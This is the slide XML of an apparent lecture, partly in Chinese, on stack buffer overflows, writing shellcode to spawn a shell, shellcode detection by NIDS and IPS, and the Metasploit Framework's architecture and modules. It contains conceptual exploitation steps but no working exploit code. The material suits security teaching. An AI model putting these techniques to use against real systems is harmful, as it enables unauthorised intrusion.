                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>  A(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>Biggerstring</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>}</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57351" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5070" y="4001"/>
              <a:ext cx="900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ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>SFP (4)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6870" y="4001"/>
              <a:ext cx="750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ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>charPtr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53" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5970" y="4001"/>
              <a:ext cx="900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ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>RET (4)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4020" y="4001"/>
              <a:ext cx="1050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ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>Buffer1 (4)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5070" y="4310"/>
              <a:ext cx="900" cy="3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solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>AAAA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6870" y="4310"/>
              <a:ext cx="750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57357" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5970" y="4310"/>
              <a:ext cx="900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solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>AAAA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4020" y="4310"/>
              <a:ext cx="1050" cy="3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ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>AAAA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59" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7920" y="4001"/>
              <a:ext cx="900" cy="6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ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>Bottom of Stack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60" name="AutoShape 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8220" y="4773"/>
              <a:ext cx="300" cy="310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2970" y="4001"/>
              <a:ext cx="900" cy="6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000">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>Top of Stack</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57362" name="AutoShape 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3270" y="4773"/>
              <a:ext cx="300" cy="310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rgbClr val="FFFFFF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AutoShape 19"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000">
              <a:off x="5893" y="3950"/>
              <a:ext cx="154" cy="1800"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 97403"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst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/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57364" name="Text Box 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4920" y="5082"/>
              <a:ext cx="2250" cy="30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000">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>Stack Buffer Overflow</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN"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67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Developing Shellcode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077200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Finding the Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Writing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t> is sequence of machine instructions or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>opcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>To take advantage of the injected code and to gain access to the target system, system calls must be used </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t> On Linux there are two ways of implementing a system call, they are icall87/icall27 gates and ‘INT 0x80’ software interrupts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="240414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– Spawning a Shell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4953000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Write C code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Extract the assembly code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Extract the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>opcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Append an function exit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>opcodes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t> to allow the function exit gracefully</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Initialize a buffer with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>opcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="378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3400" y="1905000"/>
            <a:ext cx="2725738" cy="21478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7295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Example – Spawning a Shell cont’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39941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600200"/>
            <a:ext cx="6477000" cy="947738"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39972" name="Picture 3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514600"/>
            <a:ext cx="6629400" cy="4002088"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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457200" y="5105400"/>
            <a:ext cx="7467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93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Methods for Detecting Shellcode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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>NIDS (Network Intrusion Detection System) can be used to identify shellcode on the wire using Signature databases and Protocol analysis methods </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>IPS (Intrusion Prevention System) identifies shellcode by running the code on a sandbox/virtualization in order to detect if the given code is malicious or not </a:t>
            </a:r>
          </a:p>
          <a:p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21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Conclusion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153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100">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode is a powerful mechanism for the exploitation of software vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>It is important that the shellcode developed is small in size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode can be employed to automate software security tests, where the shellcode is written to expose and draw attention to security holes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4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ea"/>
              </a:rPr>
              <a:t>4.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件漏洞利用平台及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr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 smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> Framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>（开源，免费）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Immunity CANVAS(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>商业软件，价格高</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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016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b="1" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Framework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5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>It’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>an Exploitation Framework designed for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>security researchers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>pentesters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> with a uniform model for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>rapid development </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Recon,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Exploits,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Payloads,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Encoders,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Post-Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Pivoting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Others? (please add)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91574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man Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MSF Architecture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msfArch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650" y="1219200"/>
            <a:ext cx="8648700" cy="5486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b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>漏洞利用过程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漏洞挖掘  （模糊测试等）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>分析 （源码审计与分析）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>(exploit)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>修</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>复</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>0day – 1day – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>nday</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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625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Components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Metasploit Framework is a modular system based on a few core components: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Libraries,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>interfaces, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>modules, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>mixins, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>and plugins.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Libraries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Rex (Ruby Extension Library):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Provides Sockets, protocols, text transformations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Msf::Core (Core library / msfcore):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>enables exploits, sessions, and plugins to interact with the different interfaces.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Msf::Base (Base library / msfbase):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>provides wrapper routines and utility classes that you can use to easily work with the Core library.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8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Metasploit Interfaces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MSFconsole </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> interactive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>MSFcli </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>MSFweb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> as the name implies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>MSFgui </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> java based GUI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>and Armitage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> interactive GUI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6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Modules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Core components of MSF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A piece of software that can perform a specific action. (ex: exploitation, fuzzing, and scanning).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Modules are found in the following directory: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;installation-directory&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/msf3/modules.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Categorized by type and then by protocol. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MSF Modules include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
